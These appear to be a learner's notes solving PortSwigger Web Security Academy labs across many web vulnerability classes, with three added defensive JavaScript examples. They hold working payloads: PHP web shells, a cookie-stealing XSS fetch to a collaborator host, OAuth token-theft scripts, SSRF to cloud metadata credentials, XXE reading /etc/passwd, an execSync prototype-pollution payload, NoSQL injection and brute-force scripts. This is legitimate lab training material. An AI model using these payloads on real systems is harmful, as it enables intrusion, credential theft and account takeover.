Engagement tools > Discover content
save selected items
wget -r https://0a670078049c8873818143e8004b0084.web-security-academy.net/.git
ls
cd 0a670078049c8873818143e8004b0084.web-security-academy.net
ls -a
cd .git
git branch
git log
git diff f088b3443bd7171ae1c15dec835b0bce5977b5db 056cb9cba2b5d3e90f37c50411eaabd3452e364f

Business logic vulnerabilities


1.Excessive trust in client-side controls

enable those settings


modify the price.

2.High-level logic vulnerability


here there is no product price to change, so look for another vulnerability; add 2 more products
to the cart

add a minus value before the quantity, refresh the page {-}


see the total has changed,

3.Inconsistent security controls

change your email to this; you see the admin field

4.Flawed enforcement of business rules

Log in and notice that there is a coupon code, NEWCUST5.

At the bottom of the page, sign up to the newsletter. You receive another
coupon code, SIGNUP30.

Add the leather jacket to your cart.


Go to the checkout and apply both of the coupon codes to get a discount on
your order.

Try applying the codes more than once. Notice that if you enter the same code
twice in a row, it is rejected because the coupon has already been applied. However, if you
alternate between the two codes, you can bypass this control.

5.Low-level logic flaw


see here the price is increasing, so we can try some null payloads (empty the cart & in the
Repeater tab send to Intruder)
go to the browser cart, check it's stuck at some count
look carefully, there is a minus value in the total {-}
back to Repeater, send multiple times, like 10 or 15

back to the browser, you'll see the price is decreasing,


with that in mind we can bring the total down until it equals our balance.

6.Inconsistent handling of exceptional input

Go to the account registration page. Notice the message telling DontWannaCry employees to use their company email address.

From the button in the lab banner, open the email client. Make a note of the
unique ID in the domain name for your email server (@YOUR-EMAIL-ID.web-security-academy.net).

Go back to the lab and register with an exceptionally long email address in
the format:
very-long-string@YOUR-EMAIL-ID.web-security-academy.net

The very-long-string should be at least 300 characters long. {very long string means
{123456789} repeated multiple times}

Go to the email client and notice that you have received a confirmation email.
Click the link to complete the registration process.

Log in and go to the "My account" page. Notice that your email address has
been truncated to 255 characters.

Log out and go back to the account registration page.

Register a new account with another long email address, but this time
include dontwannacry.com as a subdomain in your email address as follows:

very-long-string@dontwannacry.com.YOUR-EMAIL-ID.web-security-academy.net

Make sure that the very-long-string is the right number of characters so that the "m" at the end of @dontwannacry.com is character 255 exactly.

Go to the email client and click the link in the confirmation email that you
have received. Log in to your new account and notice that you now have access to the
admin panel. The confirmation email was successfully sent to your email client, but the
application server truncated the address associated with your account to 255 characters.
As a result, you have been able to register with what appears to be a valid
@dontwannacry.com address. You can confirm this from the "My account" page.
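The flaw described above is validate-then-truncate: the confirmation mail goes to the full address, but the value that is stored (and later used for the admin check) is a silently shortened copy. As an added example, not from the lab or the page, here is that logic next to a registration check that refuses anything it could not store exactly as validated. The mail domain passed to craftedAddress() is a constructed placeholder.

```javascript
// Added example, not from the page: registration that truncates after validating
// (vulnerable) beside one that rejects over-length input (fixed).
const MAX_EMAIL_LENGTH = 255;               // the column width the lab's server truncates to
const COMPANY_DOMAIN = 'dontwannacry.com';

// Company membership is decided by the domain after the last "@".
function isCompanyEmail(email) {
  const at = email.lastIndexOf('@');
  return at !== -1 && email.slice(at + 1).toLowerCase() === COMPANY_DOMAIN;
}

// Vulnerable: mail goes to the full address, privileges are derived from a truncated copy.
function registerVulnerable(email) {
  if (!email.includes('@')) return { ok: false, reason: 'invalid email' };
  const stored = email.slice(0, MAX_EMAIL_LENGTH);
  return { ok: true, mailedTo: email, stored, isAdmin: isCompanyEmail(stored) };
}

// Fixed: refuse any value that would not be stored exactly as it was validated, so the
// address that received the confirmation is the one that gets privileges.
function registerFixed(email) {
  if (!email.includes('@')) return { ok: false, reason: 'invalid email' };
  if (email.length > MAX_EMAIL_LENGTH) return { ok: false, reason: 'email too long' };
  return { ok: true, mailedTo: email, stored: email, isAdmin: isCompanyEmail(email) };
}

// Rebuilds the address shape the lab describes: padded so the final "m" of
// "@dontwannacry.com" is exactly character 255, followed by a mail domain the
// registrant actually controls (constructed placeholder).
function craftedAddress(mailDomain) {
  const suffix = '@' + COMPANY_DOMAIN;
  const local = 'a'.repeat(MAX_EMAIL_LENGTH - suffix.length);
  return local + suffix + '.' + mailDomain;
}
```

The general rule behind registerFixed is that every field must be validated in the exact form it will be persisted and compared in; length limits belong in the validator, not in the storage layer's silent truncation.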

7.Weak isolation on dual-use endpoint * remove the current-password parameter totally *


Notice that if you remove the current-password parameter entirely, you are able to
successfully change your password without providing your current one.

8.Insufficient workflow validation

1. With Burp running, log in and buy any item that you can afford with your
store credit.

2. Study the proxy history. Observe that when you place an order, the POST
/cart/checkout request redirects you to an order confirmation page. Send GET
/cart/order-confirmation?order-confirmation=true to Burp Repeater.
3. Add the leather jacket to your basket.

4. In Burp Repeater, resend the order confirmation request. Observe that the order is completed without the cost being deducted from your store credit and the lab is solved.

9.Authentication bypass via flawed state machine


With Burp running, complete the login process and notice that you need to select your role
before you are taken to the home page. Log out and then go back to
the login page. In Burp, turn on proxy intercept then log in.

Forward the POST /login request. The next request is GET /role-selector .
Drop this request and then browse to the lab's home page. Observe that your role has
defaulted to the administrator role and you have access to the admin panel.

10.Infinite money logic flaw


POST /cart
POST /cart/coupon
POST /cart/checkout
GET /cart/order-confirmation?order-confirmed=true
POST /gift-card
Run a macro
Send to Intruder
go to the browser & refresh; your store credit will be high,

11.Authentication bypass via encryption oracle


send both to Repeater
this is the normal request

take the POST response Set-Cookie value, change it in the GET request cookie.
take the stay-logged-in cookie & paste it in the GET
wiener:1703950716797 is the timestamp
delete the 1st 2 lines of bytes
copy the cookie

send to Repeater
this is the normal request

completely remove the session cookie, & replace the stay-logged-in cookie.


HTTP Host header attacks
1.Basic password reset poisoning
if this does not work change HTTP/2 to HTTP/1
2.Host header authentication bypass
3.Web cache poisoning via ambiguous requests
store it
show response in browser

4.Routing-based SSRF
5.SSRF via flawed request parsing
look for csrf in the response

GET https://YOUR-LAB-ID.web-security-academy.net/admin/delete?csrf=QCT5OmPeAAPnyTKyETt29LszLL7CbPop&username=carlos

6.Host validation bypass via connection state attack


add to a tab group
/admin/delete?username=carlos&csrf=

OAuth authentication

1.Authentication bypass via OAuth implicit flow


show response in browser

2.Forced OAuth profile linking


Turn on proxy interception and select the "Attach a social profile" option again.

Go to Burp Proxy and forward any requests until you have intercepted the one
for GET /oauth-linking?code=[...] . Right-click on this request and select "Copy URL".

Drop the request. This is important to ensure that the code is not used and,
therefore, remains valid.
3.OAuth account hijacking via redirect_uri

intercept the request, because in history it is not shown


copy URL

<iframe src="https://oauth-YOUR-LAB-OAUTH-SERVER-ID.oauth-server.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe>


https://YOUR-LAB-ID.web-security-academy.net/oauth-callback?code=STOLEN-CODE

then log out

https://0a44008504d6e3d0807c85c0001600dc.web-security-academy.net/oauth-callback?code=t1cRtTqDk4HSkUIoZyptKdvDwchTAL0ILBqhILSXLX2

4.Stealing OAuth access tokens via an open redirect

this is also similar to the above; the redirect is not shown in history so intercept it, & the redirect
does not work this time
log out

it's confirmation of path traversal

<script>
    if (!document.location.hash) {
        window.location = 'https://oauth-YOUR-OAUTH-SERVER-ID.oauth-server.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-LAB-ID.web-security-academy.net/oauth-callback/../post/next?path=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/exploit/&response_type=token&nonce=399721827&scope=openid%20profile%20email'
    } else {
        window.location = '/?'+document.location.hash.substr(1)
    }
</script>

decode URL

5.SSRF via OpenID dynamic client registration


POST /reg HTTP/1.1
Host: oauth-YOUR-OAUTH-SERVER.oauth-server.net
Content-Type: application/json

{
    "redirect_uris" : [
        "https://example.com"
    ],
    "logo_uri" : "https://BURP-COLLABORATOR-SUBDOMAIN"
}

POST /reg HTTP/1.1


Host: oauth-0a3c00cc033a41cd8188845c02f30006.oauth-server.net
Content-Type: application/json

{
"redirect_uris" : [
"https://example6.com"
],
"logo_uri" : "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin/"
}

File upload vulnerabilities


1.Remote code execution via web shell upload
<?php echo file_get_contents('/home/carlos/secret'); ?>

open the image in a new tab

2.Web shell upload via Content-Type restriction bypass


open the image in a new tab

3.Web shell upload via [path traversal

If the PHP file shows nothing, look at the GET response in Burp: the code comes back as text instead
of running. Send the POST request to Repeater and add ../ in front of the exploit filename in
Content-Disposition; if a 404 error comes back, URL-encode the / and upload again in the same place
(in the browser, put a normal / in the URL-encoded place and refresh).
4.Web shell upload via extension blacklist bypass

If "PHP files not allowed" comes back, send the POST request to Repeater twice. In the 1st request
make these changes: { Change the value of the filename parameter to .htaccess.
Change the value of the Content-Type header to text/plain.

Replace the contents of the file (your PHP payload) with the following Apache directive:
AddType application/x-httpd-php .l33t } In the 2nd request: { Change the value of the filename
parameter from exploit.php to exploit.l33t. Send the request again and notice that the file
was uploaded successfully. }


refresh & open the image in a new tab

5.Web shell upload via obfuscated file extension


%00.jpg

6.Remote code execution via polyglot web shell upload


exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" <YOUR-INPUT-IMAGE>.jpg -o polyglot.php

JWT
1.JWT authentication bypass via unverified signature
2.JWT authentication bypass via flawed signature verification
3.JWT authentication bypass via weak signing key
replace the token with modified one

4.JWT authentication bypass via jwk header injection


5.JWT authentication bypass via jku header injection
copy all of the value, paste it in notepad

{
    "keys": [
        {
            "kty": "RSA",
            "e": "AQAB",
            "kid": "893d8f0b-061f-42c2-a4aa-5056e12b8ae7",
            "n": "yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw"
        }
    ]
}

above is the payload

replace the "kid" & "n" values & store it


this is the normal one
replace the kid value, & "jku", & sub.

6.JWT authentication bypass via kid header path traversal


Replace the generated value for the k property with a Base64-encoded null byte ( AA== ).
this is the normal request
../../../../../../../dev/null

Essential skills
1.Scanning non-standard data structures
you need to try 2 or 3 times to pop the error

'"><svg/onload=fetch(`//nh8zbq0uabywzfzu5do41gmujlphd71zrnid53ts.oastify.com`)>:2TWUtrzjkBaV72RPkbxI8VYx3tkpdb4g

like the above, we need to modify it into this form

'"><svg/onload=fetch(`//YOUR-COLLABORATOR-PAYLOAD/${encodeURIComponent(document.cookie)}`)>:YOUR-SESSION-ID

'"><svg/onload=fetch(`//oe6h4iduvd131u0kxkwvuccaj1psdi17.oastify.com/${encodeURIComponent(document.cookie)}`)>:2TWUtrzjkBaV72RPkbxI8VYx3tkpdb4g

Go back to the Collaborator tab. After approximately one minute


2.Discovering vulnerabilities quickly with targeted scanning
there is no login function, only one function, that is the product stock check function, so I
only give that to active scan,
productId=<xi:include parse="text" href="file:///etc/passwd"/>&storeId=1

Prototype pollution

1.Client-side prototype pollution via browser APIs


2.DOM XSS via client-side prototype pollution

same as above

3.DOM XSS via an alternative prototype pollution vector

same as above

4.Client-side prototype pollution in third-party libraries


5.Privilege escalation via server-side prototype pollution

"__proto__": { "foo":"bar" }

"__proto__": { "isAdmin":true }
6.Detecting server-side prototype pollution without polluted property reflection

"__proto__": { "foo":"bar" }
7.Bypassing flawed input filters for server-side prototype pollution
"constructor": {
"prototype": {
"foo":"bar"
}
}

"constructor": {
"prototype": {
"isAdmin":"true"
}
}

8.Remote code execution via server-side prototype pollution

"__proto__": { "execArgv":[ "--eval=require('child_process').execSync('rm /home/carlos/morale.txt')" ] }
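The labs above all rely on a server-side merge that walks user-controlled keys straight into the object graph, so "__proto__" reaches Object.prototype directly and "constructor"."prototype" reaches it through the Object function. As an added example, not from the page or from any library, here is a recursive merge of that kind beside a hardened version, and a check that shows whether a property injected through the payload turns up on an unrelated object afterwards. The payloads are constructed samples in the same shape as the labs'.

```javascript
// Added example, not from the page: prototype-polluting merge vs. hardened merge.

// Vulnerable: trusts every key in the source and descends into whatever target[key]
// resolves to, including inherited values such as the prototype itself.
function mergeVulnerable(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value !== null && typeof value === 'object') {
      const existing = target[key];        // "__proto__" resolves to Object.prototype here
      if (existing === null || (typeof existing !== 'object' && typeof existing !== 'function')) {
        target[key] = {};
      }
      mergeVulnerable(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Hardened: drop the keys that lead to a prototype, and only descend into properties
// the target actually owns, never into inherited ones.
function mergeSafe(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;   // log this in a real service: it is an attack signal
    const value = source[key];
    if (value !== null && typeof value === 'object') {
      if (!Object.prototype.hasOwnProperty.call(target, key) ||
          target[key] === null || typeof target[key] !== 'object') {
        target[key] = {};
      }
      mergeSafe(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Merge a parsed JSON body into a fresh object, then ask an unrelated object created
// afterwards whether it inherited isAdmin. Cleans up so the check is repeatable.
function pollutionLeaksTo(mergeFn, payloadJson) {
  mergeFn({ username: 'wiener' }, JSON.parse(payloadJson));
  const bystander = {};
  const leaked = bystander.isAdmin === true;
  delete Object.prototype.isAdmin;
  return leaked;
}
```

Two details make the vulnerable version realistic: JSON.parse creates "__proto__" as an own key (so Object.keys returns it), and reading target["__proto__"] on a plain object returns its prototype. Skipping the three forbidden keys closes both the direct and the constructor.prototype route shown in labs 7 and 8; freezing Object.prototype or using Object.create(null) for config objects are the usual defence-in-depth additions.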
GraphQL API vulnerabilities
1.Accessing private GraphQL posts
in Dashboard
copy all the data
2.Accidental exposure of private GraphQL fields

log in with wrong credentials


send to Repeater

original
modified

3.Finding a hidden GraphQL endpoint

before login try every GraphQL endpoint

/graphql
/graphiql
/api
/v1
/graphql/v1
/v1/graphql
/api/graphql
/graphql/api
/graphql/graphql
/graphiql/v1
/v1/graphiql
/api/graphiql
/graphiql/api
/graphiql/graphiql
api?query=query{__typename}

https://graphql-kit.com/graphql-voyager/
encode URL

this is the old one

enter a new line after schema


right-click on the response, copy to file, choose Desktop, save as "schema.json"
open schema.json in notepad, remove the header & copy all of the body
1st take GET user info

{ "data": { "getUser": null } }


4.Bypassing GraphQL brute force protections

send that multiple times


there is a timeout error

copy(`123456,password,12345678,qwerty,123456789,12345,1234,111111,1234567,dragon,123123,baseball,abc123,football,monkey,letmein,shadow,master,666666,qwertyuiop,123321,mustang,1234567890,michael,654321,superman,1qaz2wsx,7777777,121212,000000,qazwsx,123qwe,killer,trustno1,jordan,jennifer,zxcvbnm,asdfgh,hunter,buster,soccer,harley,batman,andrew,tigger,sunshine,iloveyou,2000,charlie,robert,thomas,hockey,ranger,daniel,starwars,klaster,112233,george,computer,michelle,jessica,pepper,1111,zxcvbn,555555,11111111,131313,freedom,777777,pass,maggie,159753,aaaaaa,ginger,princess,joshua,cheese,amanda,summer,love,ashley,nicole,chelsea,biteme,matthew,access,yankees,987654321,dallas,austin,thunder,taylor,matrix,mobilemail,mom,monitor,monitoring,montana,moon,moscow`.split(',').map((element,index)=>`
bruteforce$index:login(input:{password: "$password", username: "carlos"}) {
        token
        success
    }
`.replaceAll('$index',index).replaceAll('$password',element)).join('\n'));console.log("The query has been copied to your clipboard.");

Open the lab in Burp's browser.

Right-click the page and select Inspect.

Select the Console tab.

Paste the script and press Enter.


here the numbers are important; paste that in notepad
5.Performing CSRF exploits over GraphQL
change email functionality

send to Repeater

change request method


again change request method back to POST

now we see the content type has changed, because with the JSON content type CSRF was not possible

now send the original request once again to Repeater to see InQL


query=%0A++++mutation+changeEmail%28%24input%3A+ChangeEmailInput%21%29+%7B%0A++++++++changeEmail%28input%3A+%24input%29+%7B%0A++++++++++++email%0A++++++++%7D%0A++++%7D%0A&operationName=changeEmail&variables=%7B%22input%22%3A%7B%22email%22%3A%22hacker%40hacker.com%22%7D%7D

paste it in the modified request; now generate a CSRF PoC to send to the victim


change the email id

Race conditions
1.Limit overrun [race conditions
send to Turbo Intruder

make sure that before, you remove the coupon code in the browser

then hit attack


go to the browser, refresh

now it's done here; if it's not enough credit then go back and configure with a different number

2.Bypassing rate limits via race conditions


after 4 login attempts there is a timeout error

it happens to every account


take the POST /login request, send to Repeater 20 times

create a tab group with separate connections; every 4th request is a timeout error
so back to the Proxy tab, select the POST /login request, right-click, select Extensions > Turbo
Intruder > Send to Turbo Intruder; above is the actual request. {examples/race-single-packet-
attack.py}

take the payload below and replace the actual one with it; in the request don't forget to change the
password value to { %s }; copy the payloads to the clipboard, then click Attack.

def queueRequests(target, wordlists):

    # as the target supports HTTP/2, use engine=Engine.BURP2 and concurrentConnections=1 for a single-packet attack
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2
                           )

    # assign the list of candidate passwords from your clipboard
    passwords = wordlists.clipboard

    # queue a login request using each password from the wordlist
    # the 'gate' argument withholds the final part of each request until engine.openGate() is invoked
    for password in passwords:
        engine.queue(target.req, password, gate='1')

    # once every request has been queued
    # invoke engine.openGate() to send all requests in the given gate simultaneously
    engine.openGate('1')


def handleResponse(req, interesting):
    table.add(req)
3.Multi-endpoint race conditions
make sure your cart is empty
4.Single-endpoint race conditions
Someone with the address carlos@ginandjuice.shop has a pending invite to be an
administrator for the site, but they have not yet created an account. Therefore, any user
who successfully claims this address will automatically inherit admin privileges.

5.Exploiting time-sensitive vulnerabilities


send the POST request 2 times to Repeater, & 1 time the GET request
each time the token changed
add the 2 POST requests to one group

completely remove the cookie in the GET request


in there you find a new session & new csrf; take both and replace them in the second POST
request, also the username.

send in parallel
take that link, paste it in notepad

change the username to carlos, leave the token as it is, open in a new browser.

NoSQL injection
1.Detecting NoSQL injection

'+'
Make sure to URL-encode the payload by highlighting it and using the Ctrl-U
' || 1 || 'x

'||1||'x

2.Exploiting NoSQL operator injection to bypass authentication

{
"$ne":""
}
{
"$regex":"wien.*"
}

{"username":{
"$regex":"admin.*"
},"password":{
"$ne":""
}
}
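The payloads above work because the server lets a parsed JSON body become the query filter, so {"$ne":""} and {"$regex":"admin.*"} arrive where the code expected plain strings. As an added example (not from the page, and a stand-in rather than a real MongoDB driver), here is a tiny in-memory matcher for just those two operators, the vulnerable and the fixed way of building the login filter, and a detector for log review. The user records are constructed samples.

```javascript
// Added example, not from the page: why operator injection matches, and how to refuse it.
const USERS = [   // constructed sample records
  { username: 'wiener', password: 'peter' },
  { username: 'administrator', password: 'not-a-real-password' },
];

// Evaluate one field condition the way MongoDB would for the operators used above:
// a plain value means equality, an object is a set of operators applied to the field.
function matchesCondition(value, cond) {
  if (cond !== null && typeof cond === 'object') {
    return Object.entries(cond).every(([op, arg]) => {
      if (op === '$ne') return value !== arg;
      if (op === '$regex') return new RegExp(arg).test(value);   // unanchored, like $regex
      throw new Error('unsupported operator ' + op);
    });
  }
  return value === cond;
}

function findUsers(filter) {
  return USERS.filter(u =>
    Object.entries(filter).every(([field, cond]) => matchesCondition(u[field], cond)));
}

// Vulnerable: the parsed JSON body is dropped straight into the filter, so the client
// decides whether each field is a string (equality) or an operator object.
function loginFilterVulnerable(body) {
  return { username: body.username, password: body.password };
}

// Fixed: credentials must be strings; objects, arrays and numbers are refused before
// any query is built. Returns null so the caller can fail closed and log the attempt.
function loginFilterSafe(body) {
  if (typeof body.username !== 'string' || typeof body.password !== 'string') return null;
  return { username: body.username, password: body.password };
}

// Detection helper for request logs: does the body carry a "$"-prefixed key anywhere?
function containsOperator(value) {
  if (Array.isArray(value)) return value.some(containsOperator);
  if (value !== null && typeof value === 'object') {
    return Object.entries(value).some(([k, v]) => k.startsWith('$') || containsOperator(v));
  }
  return false;
}
```

Type-checking at the boundary is the fix; escaping does nothing here because no string is being interpolated. The same check also blocks the $where and $regex probing used in the extraction labs, and passing user input to new RegExp() in a real service would additionally need a length limit to avoid ReDoS.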

3.Exploiting NoSQL injection to extract data


it means it's an 8-character password { administrator' && this.password.length < 30 ||
'a'=='b }

send to Intruder

' && this.password[§0§]=='§a§


Ctrl+U & create a resource pool of 1, & in the 1st position numbers & in the 2nd position letters

4.Exploiting NoSQL operator injection to extract unknown fields


{"$ne":"invalid"}

, "$where": "0"}

"Object.keys(this)[1].match('^.{}.*')"

send to intruder
this.passwordReset.match('^.{0}.*')
change request method POST to GET

Request in browser > Original session

API testing
~ email change function
send 2 requests to Repeater
2.Exploiting server-side parameter pollution in a query string

Please check your email: "*@normal-user.net"{forgot password}


here x is the field value; in Simple list select server-side variable names
3.Finding and exploiting an unused API endpoint

{PRICE change Function}


send this request again to Repeater to check whether the price is changing or not
4.Exploiting a mass assignment vulnerability
